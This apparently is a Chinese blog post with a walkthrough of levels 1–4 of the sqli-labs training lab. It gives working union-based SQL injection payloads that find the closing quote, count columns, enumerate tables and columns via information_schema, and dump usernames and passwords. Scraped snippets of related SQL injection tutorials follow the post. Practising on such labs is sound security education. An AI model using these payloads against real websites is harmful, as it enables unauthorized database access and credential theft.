sql-labs1-4关解析

最新推荐文章于 2024-05-18 15:04:49 发布
最新推荐文章于 2024-05-18 15:04:49 发布
阅读量161 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52127082/article/details/115735516
版权

首先启动phpstudy,进入网址:链接
进入第一关
在这里插入图片描述

首先判断闭合符号
闭合符号一班有四种 ‘、’’、’)、’’)。
平时常用的是 ’ 和 ‘’ 两种。

首先提示请求一个id=1,会得到一个回显位,即id=1在数据库里查询到的信息。
在这里插入图片描述
判断闭合符号先从’开始,会报错,然后用–+注释掉,会回显正确,说明闭合符号是 '。
在这里插入图片描述
在这里插入图片描述

判断列数
用order by 语句,一般列数不是很多,可以一个一个去试。
先试一下4,会报错,说明不对。
在这里插入图片描述
然后判断一下3,没有报错,说明最大列数只有3。
在这里插入图片描述

联合查询注入
用union select语句。
在这里插入图片描述
会判断出一个回显位,在第2位。

爆出数据库的名字
database()显示出当前数据库的名字,在第2位修改。
在这里插入图片描述
爆出数据库名字是security。

爆出数据表的名字
用到group_concat()函数,能将相同的行组合起来。

?id=0’ union select 1,group_concat(table_name),3 from
information_schema.tables where table_schema=‘security’–+

在这里插入图片描述
就得到了security库里所有表的名字。
下面对表users进行爆破。
爆出表的字段值

?id=0’ union select 1,group_concat(column_name),3 from
information_schema.columns where table_name=‘users’ --+

在这里插入图片描述
爆出字段的值

?id=0’ union select 1,group_concat(username,0x3a,password),3 from
users --+

在这里插入图片描述
到这里第一关就结束了。

第二关是属于整形注入(输入 id=1 and 1=1 没报错 输入 id=1 and 1=2报错的话 就是整形注入)
在这里插入图片描述
在这里插入图片描述
后面的跟第一关就一样了。

第三关
判断出闭合符号为 '),后面的跟前两关大差不差。

第四关
大体上与第三关无差,当发现注入类型不是整型注入,进行字符类型判断
当输入 ?id=1" --+ 时会发现出现错误
在这里插入图片描述
因此使用:?id=1 ")–+进行闭合
在这里插入图片描述
之后的步骤就和前面一样了。

y1 ren
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql-labs通技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
jeakinscheung-sqli-labs-php7-master.zip
03-16
3. **转义特殊字符**:使用函数如`mysqli_real_escape_string`来转义可能引起SQL语句解析错误的字符。 4. **使用存储过程**:虽然不是绝对安全,但存储过程可以在一定程度上限制恶意输入的影响。 5. **最小权限...
sqllab第四解析
Deeeelete的博客
12-09 414
按照以往经验,它们估计永远在第四个字段上报错,所以直接查字段,而且它们也必定报错 什么也没有,说明后面的语句没读取,用-1’”试试 后面出现了),所以我们知道要加),但后方也出现了”,而且奇怪的是我们之前写在order by 前面的”没了,那肯定是跟前面的某个”给闭合了,为了进一步确定,再查看一下。 它提示前面已经有了一个”,所以我们的确闭合了它,因此保留这里的”并加) 然后就是以...
sqli-labtips 前四
weixin_44089266的博客
03-31 229
**前四均为一般型sql注入,此处只对第一关进行详解,之后三只是闭合方式的变化** 提前声明:本机测试地址为 192.168.226.136 以下仅供参考,切勿用作其他用途,若有错误之处,望见谅。 首先在未知闭合方式的条件下,构造payload进行测试 http://192.168.226.136/sqli-labs-master/Less-1/?id=1 观察到页面回显正常 重新...
详细sqli-labs(1-20)通讲解
m0_57928318的博客
05-18 1052
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sql-labs 1-4(联合查询)
kuller_Yan的博客
06-27 249
less-1: id=1’ or 1=1 --+;判断是否有注入 select * from users order by 1 :对字段里面第一列进行排序 select * from users order by 2 :对字段里面第二列进行排序 select * from users order by 3 :对字段里面第三列进行排序 id=1’ order by 1 --+ ;然后依次测试2,3,4,以测试数据库列数 id=-1’ union select 1,2,3 --+ 测试可以回显的列数位置
2020.4.1 sqli-labs--第一至第四
DSR446的博客
04-01 309
1.验证方式:’ 或 and 1=1 and 1= 2 如果页面不显示内容或者报mysql错误,就说明存在注入。(get和post传参都可用) 2.mysql5.0以上的版本中,为了方便管理,默认定义了information_schema数据库,用来存储数据库元信息,其中具有表schemata(数据库名)、tables(表名)、columns(列名或字段名) schemata表中,s...
sqli-labs一第一关详细步骤,新手打基础篇
qq_50956249的博客
03-21 565
5、查出数据库名称后,爆破表名,union 1,group_concat(table_name),3,…union 1,2,group_concat(column_name),…7、查出了具体的字段名,最后一步就是查出具体的数据了,union 1,2,group _concat(username,id,password) from users–+4、先查出使用的是哪个数据库,用database()函数,以及数据库版本信息,用version()函数。输入1’–+,有用户显示。输入 1,有用户显示。
sqli-labs-master-注入学习靶机
01-19
1. **SQL注入类型**:了解不同类型的SQL注入,包括错误基于的注入、时间基的注入、盲注、联合查询注入等。 2. **查询分析**:学习如何解析HTTP请求中的查询参数,识别可能的注入点。 3. **SQL语法**:理解基本的...
sqli-labs-master靶机
10-12
SQL注入实验室(sqli-labs)详解】 ...通过sqli-labs靶机的学习,用户不仅可以提升SQL注入的检测和防护能力,还能增强网络安全意识,这对于任何从事Web开发或网络安全相工作的人来说都是至重要的。
网络攻防课程seed-labs实验-Web_SQL_Injection.zip
最新发布
06-01
《网络攻防课程:深入解析Web SQL注入》 在网络安全领域,Web应用安全是一个至重要的环节,其中SQL注入(SQL Injection)是常见的攻击手段之一。本实验“网络攻防课程seed-labs实验-Web_SQL_Injection.zip”旨在...
Sqlilabs靶场1-10详解(Get请求式)
爱吃仡坨的Blog
10-16 2476
sqlilabs用到的是mysql数据库,mysql5.0以上版本自带的数据库是information_schema,其下有tables和columns两个表tables表中的table_name字段下是所有数据库存在的表名table_schema字段下是所有表名对应的数据库名。columns表中的column_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。
sqli-labs 1-10(GET型注入)新手通详解(高手误入)
b1n的博客
07-16 2834
1.第一关是单引号字符型注入2.用--+进行注释,页面正常显示。
phpStudy2018安装完成之后,Apache刚启动就
关雷
12-28 1095
通过apache的命令行查看报错, 在Apache的bin目录下,键入httpd.exe -t 命令,系统报错:
sqli-labs通详解(1-20
2302_81105681的博客
04-11 2670
1.首先判断闭合方式在我之前发布的文章中有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一关的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面中4.爆数据库名我们可以将2或者3更改为database()来使页面回显出数据库名。
sqli-labs靶场第一关
weixin_72583035的博客
01-30 426
这是一个语法报错,因为在所有语句中单双引号必须成对出现,我们加了一个单引号就让我们从单引号里逃逸出来了,我们再加的单引号后面写语句就是我们能控制的了,但是里面还是有三个单引号,所有我们要想办法注释后面的语句或者让单引号成对。我们找到了我们的库名security现在就要找表名了,我们要构造查询列表名,information_schema.table存储了数据库中的所有表的信息。用order by 排序时用二分法排序,这里因为这个数据库的列比较少就不演示了,我们排出来数据库有3列。这样就可以过第一关了;
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1275
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sql-labs安装
08-28
4. 导入 SQL-Labs 的数据库结构。进入到您解压缩的 SQL-Labs 文件夹中,找到 `db-structure.sql` 文件,并使用以下命令导入数据库结构: ``` mysql -u your_username -p sqli < db-structure.sql ``` 替换 `...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值